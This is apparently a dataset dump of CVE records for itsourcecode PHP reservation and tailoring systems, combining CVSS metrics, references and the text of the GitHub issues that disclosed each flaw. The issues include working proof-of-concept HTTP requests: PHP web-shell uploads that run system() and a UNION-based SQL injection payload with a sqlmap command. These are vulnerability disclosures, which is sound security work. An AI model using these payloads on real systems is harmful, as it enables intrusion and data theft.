"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 6.9,
"baseSeverity": "MEDIUM",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "LOW",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "cna@vuldb.com",
"type": "Secondary"
}
]
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Exploit"
],
"url": "https://github.com/Laster-dev/CVE/issues/2"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required",
"Third Party Advisory"
],
"url": "https://vuldb.com/?ctiid.268825"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.268825"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?submit.358628"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit"
],
"url": "https://github.com/Laster-dev/CVE/issues/2"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required",
"Third Party Advisory"
],
"url": "https://vuldb.com/?ctiid.268825"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.268825"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?submit.358628"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:janobe:pool_of_bethesda_online_reservation_system:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "9DE894B7-EE1B-4ABB-8881-CF3BA3911206",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"434"
] | 434 | https://github.com/Laster-dev/CVE/issues/2 | [
"Exploit"
] | github.com | [
"Laster-dev",
"CVE"
] | # Itsourcecode Pool of Bethesda Online Reservation System Using PHP 1.0 controller.php Unrestricted Upload
# NAME OF AFFECTED PRODUCT(S)
+ Pool of Bethesda Online Reservation System Using PHP
## Vendor Homepage
+ https://itsourcecode.com/free-projects/php-project/bakery-online-ordering-system/
# AFFECTED AND/OR FIXED VERSION(S)
## submitter
+ laster
## Vulnerable File
+ controller.php
## VERSION(S)
+ V1.0
## Software Link
+ https://itsourcecode.com/wp-content/uploads/2016/05/BethesdaReservation1.zip
# PROBLEM TYPE
## Vulnerability Type
+ File upload
## Root Cause
+ In line 80 of the controller.php file, the input obtained through $-FILES is directly used to determine the storage location of the file without verification or cleaning. The specific code snippet is as follows:
+ 
## Impact
+ Attackers can exploit this vulnerability for unrestricted uploads, which may lead to file overwrite, file injection, directory traversal attacks, and denial of service attacks. Remote attacks may also result in RCE
# DESCRIPTION
+ laster discovered that the file upload operation was triggered on line 80 of the 'controller.php' file and the uploaded file was received using the '$_FILES' variable. Due to the lack of appropriate input validation and cleaning, remote attackers can pass malicious payloads through this file upload feature, resulting in unrestricted file uploads, which may further lead to remote code execution (RCE).
# Vulnerability details and POC
## Payload
##
```
POST /admin/mod_room/controller.php?action=add HTTP/1.1
Host: localhost:8102
Content-Length: 2776
Cache-Control: max-age=0
sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="98"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost:8102
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary2d1Mv3huV7gKmnQU
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost:8102/admin/mod_room/index.php?view=add
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
------WebKitFormBoundary2d1Mv3huV7gKmnQU
Content-Disposition: form-data; name="roomNo"
22
------WebKitFormBoundary2d1Mv3huV7gKmnQU
Content-Disposition: form-data; name="name"
22
------WebKitFormBoundary2d1Mv3huV7gKmnQU
Content-Disposition: form-data; name="rmtype"
93
------WebKitFormBoundary2d1Mv3huV7gKmnQU
Content-Disposition: form-data; name="price"
22
------WebKitFormBoundary2d1Mv3huV7gKmnQU
Content-Disposition: form-data; name="adult"
22
------WebKitFormBoundary2d1Mv3huV7gKmnQU
Content-Disposition: form-data; name="children"
22
------WebKitFormBoundary2d1Mv3huV7gKmnQU
Content-Disposition: form-data; name="image"; filename="rce.php"
Content-Type: image/jpeg
Node: Sorry, due to some encoding reasons, I am unable to use Markdown to store image data with attack payloads here. I will take a screenshot to show
<?php system('ipconfig'); ?>
------WebKitFormBoundary2d1Mv3huV7gKmnQU
Content-Disposition: form-data; name="save"
------WebKitFormBoundary2d1Mv3huV7gKmnQU--
```
+ 
## I successfully executed the PHP script on the terminal
+  | Itsourcecode Pool of Bethesda Online Reservation System Using PHP 1.0 controller.php Unrestricted Upload | https://api.github.com/repos/Laster-dev/CVE/issues/2/comments | 0 | 2024-06-17T14:20:59Z | 2024-06-17T14:23:22Z | https://github.com/Laster-dev/CVE/issues/2 | 2,357,481,064 | 2 | 6,090 |
CVE-2024-6109 | 2024-06-18T12:15:12.987 | A vulnerability was found in itsourcecode Tailoring Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file addmeasurement.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-268855. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "LOW",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "LOW",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "cna@vuldb.com",
"type": "Secondary"
}
]
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/PHJ-doit/cve/issues/1"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required",
"Third Party Advisory"
],
"url": "https://vuldb.com/?ctiid.268855"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.268855"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?submit.358590"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/PHJ-doit/cve/issues/1"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required",
"Third Party Advisory"
],
"url": "https://vuldb.com/?ctiid.268855"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.268855"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?submit.358590"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:angeljudesuarez:tailoring_management_system:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "D6D27827-5554-4FAB-8460-52599930F4FF",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/PHJ-doit/cve/issues/1 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"PHJ-doit",
"cve"
] | # Itsourcecode Tailoring Management System Project In PHP With Source Code v1.0 addmeasurement.php SQL injection
# NAME OF AFFECTED PRODUCT(S)
+ Tailoring Management System Project In PHP With Source Code
## Vendor Homepage
+ https://itsourcecode.com/free-projects/php-project/tailoring-management-system-project-in-php-with-source-code/
# AFFECTED AND/OR FIXED VERSION(S)
## submitter
+ PHJ-doit
## Vulnerable File
+ addmeasurement.php
## VERSION(S)
+ V1.0
## Software Link
+ https://itsourcecode.com/wp-content/uploads/2021/04/tailoring-management-system-project-in-php-with-source-code.zip
# PROBLEM TYPE
## Vulnerability Type
+ SQL injection
## Root Cause
+ A SQL injection vulnerability was found in the 'addmeasurement.php' file of the 'Tailoring Management System Project In PHP With Source Code' project. The reason for this issue is that attackers inject malicious code from the parameter "id" and use it directly in SQL queries without appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations.
<img width="936" alt="1" src="https://github.com/PHJ-doit/cve/assets/173027847/07246e6a-9de2-4f43-ba21-0e4fde3547a4">
## Impact
+ Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity.
# DESCRIPTION
+ Due to insufficient user input validation for the "id" parameter, a serious SQL injection vulnerability has been discovered in the "Tailoring Management System Project in PHP With Source Code", allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to databases, modify or delete data, and access sensitive information. Immediate remedial measures are needed to ensure system security and protect data integrity.
# Vulnerability details and POC
POST /addmeasurement.php?id=1 HTTP/1.1
Host: 192.168.1.138:2223
Content-Length: 95
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.1.138:2223
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.1.138:2223/addmeasurement.php?id=1
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: __utma=123545163.603012537.1718449838.1718449838.1718449838.1; __utmz=123545163.1718449838.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=umavm58j5beqmmme0aof5v26v4
Connection: close
14=&15=&16=&17=&18=&19=&20=&21=&38=&39=&40=&41=&42=&43=&44=&45=&47=&48=&49=&50=&51=&52=&53=&54=
## Vulnerability type:
+ UNION query
## Vulnerability location:
+ 'id' parameter
## Payload:
```
Parameter: id (GET)
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: id=1' UNION ALL SELECT CONCAT(CONCAT('qvqxq','isbpCDfcLpAYKMKNqMJiFqWJnEUFpeWoAzqmHKaL'),'qqbpq'),NULL-- GQQV
```
<img width="322" alt="2" src="https://github.com/PHJ-doit/cve/assets/173027847/a5493b0e-75ad-4f04-ad11-6c4413a82056">
## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool:
```bash
sqlmap -r 123 --batch --dbs
```
<img width="315" alt="3" src="https://github.com/PHJ-doit/cve/assets/173027847/e507901c-5ed4-4fdc-9ea3-cbcc71e532dc">
# Suggested repair
1. **Use prepared statements and parameter binding:**
Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code.
2. **Input validation and filtering:**
Strictly validate and filter user input data to ensure it conforms to the expected format.
3. **Minimize database user permissions:**
Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations.
4. **Regular security audits:**
Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities. | Itsourcecode Tailoring Management System Project In PHP With Source Code v1.0 addmeasurement.php SQL injection | https://api.github.com/repos/PHJ-doit/cve/issues/1/comments | 0 | 2024-06-17T13:16:48Z | 2024-06-17T13:16:48Z | https://github.com/PHJ-doit/cve/issues/1 | 2,357,328,531 | 1 | 6,091 |
CVE-2024-6110 | 2024-06-18T12:15:13.290 | A vulnerability was found in itsourcecode Magbanua Beach Resort Online Reservation System up to 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file controller.php. The manipulation of the argument image leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-268856. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 6.9,
"baseSeverity": "MEDIUM",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "LOW",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "cna@vuldb.com",
"type": "Secondary"
}
]
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Exploit"
],
"url": "https://github.com/Laster-dev/CVE/issues/1"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required",
"Third Party Advisory"
],
"url": "https://vuldb.com/?ctiid.268856"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.268856"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?submit.358592"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit"
],
"url": "https://github.com/Laster-dev/CVE/issues/1"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required",
"Third Party Advisory"
],
"url": "https://vuldb.com/?ctiid.268856"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.268856"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?submit.358592"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:janobe:magbanua_beach_resort_online_reservation_system:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "6CB7216D-7848-48BA-9A2D-BFC765A0ED26",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"434"
] | 434 | https://github.com/Laster-dev/CVE/issues/1 | [
"Exploit"
] | github.com | [
"Laster-dev",
"CVE"
] | # Itsourcecode Magbanua’s Beach Resort Online Reservation System 1.0 controller.php Unrestricted Upload
# NAME OF AFFECTED PRODUCT(S)
+ Magbanua’s Beach Resort Online Reservation System
## Vendor Homepage
+ https://itsourcecode.com/free-projects/php-project/magbanua-beach-resort-online-reservation-system/
# AFFECTED AND/OR FIXED VERSION(S)
## submitter
+ laster
## Vulnerable File
+ controller.php
## VERSION(S)
+ V1.0
## Software Link
+ https://itsourcecode.com/wp-content/uploads/2016/05/magbanua.zip
# PROBLEM TYPE
## Vulnerability Type
+ File upload
## Root Cause
+ In line 157 of the newdriver.php file, the input obtained through $-FILES is directly used to determine the storage location of the file without verification or cleaning. The specific code snippet is as follows:
+ 
## Impact
+ Attackers can exploit this vulnerability for unrestricted uploads, which may lead to file overwrite, file injection, directory traversal attacks, and denial of service attacks. Remote attacks may also result in RCE
# DESCRIPTION
+ laster discovered that the file upload operation was triggered on line 157 of the 'controller.php' file and the uploaded file was received using the '$-FILES' variable. Due to the lack of appropriate input validation and cleaning, remote attackers can pass malicious payloads through this file upload feature, resulting in unrestricted file uploads, which may further lead to remote code execution (RCE).
# Vulnerability details and POC
## Payload
##
```
POST /admin/mod_room/controller.php?action=add HTTP/1.1
Host: 20.20.20.130:8102
Content-Length: 2677
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://20.20.20.130:8102
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary0fqtxeDv9FaLBl0E
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://20.20.20.130:8102/admin/mod_room/index.php?view=add
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
------WebKitFormBoundary0fqtxeDv9FaLBl0E
Content-Disposition: form-data; name="name"
3
------WebKitFormBoundary0fqtxeDv9FaLBl0E
Content-Disposition: form-data; name="rmtype"
93
------WebKitFormBoundary0fqtxeDv9FaLBl0E
Content-Disposition: form-data; name="price"
3
------WebKitFormBoundary0fqtxeDv9FaLBl0E
Content-Disposition: form-data; name="adult"
3
------WebKitFormBoundary0fqtxeDv9FaLBl0E
Content-Disposition: form-data; name="children"
3
------WebKitFormBoundary0fqtxeDv9FaLBl0E
Content-Disposition: form-data; name="image"; filename="rce.php"
Content-Type: image/jpeg
Node: Sorry, due to some encoding reasons, I am unable to use Markdown to store image data with attack payloads here. I will take a screenshot to show
<?php system("ipconfig"); ?>
------WebKitFormBoundary0fqtxeDv9FaLBl0E
Content-Disposition: form-data; name="save"
------WebKitFormBoundary0fqtxeDv9FaLBl0E--
```
+ 
## I successfully executed the PHP script on the terminal
+  | Itsourcecode Magbanua’s Beach Resort Online Reservation System 1.0 controller.php Unrestricted Upload | https://api.github.com/repos/Laster-dev/CVE/issues/1/comments | 0 | 2024-06-17T13:45:15Z | 2024-06-17T13:45:15Z | https://github.com/Laster-dev/CVE/issues/1 | 2,357,394,445 | 1 | 6,092 |
CVE-2024-6111 | 2024-06-18T13:15:52.193 | A vulnerability classified as critical has been found in itsourcecode Pool of Bethesda Online Reservation System 1.0. This affects an unknown part of the file login.php. The manipulation of the argument email leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-268857 was assigned to this vulnerability. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 6.9,
"baseSeverity": "MEDIUM",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
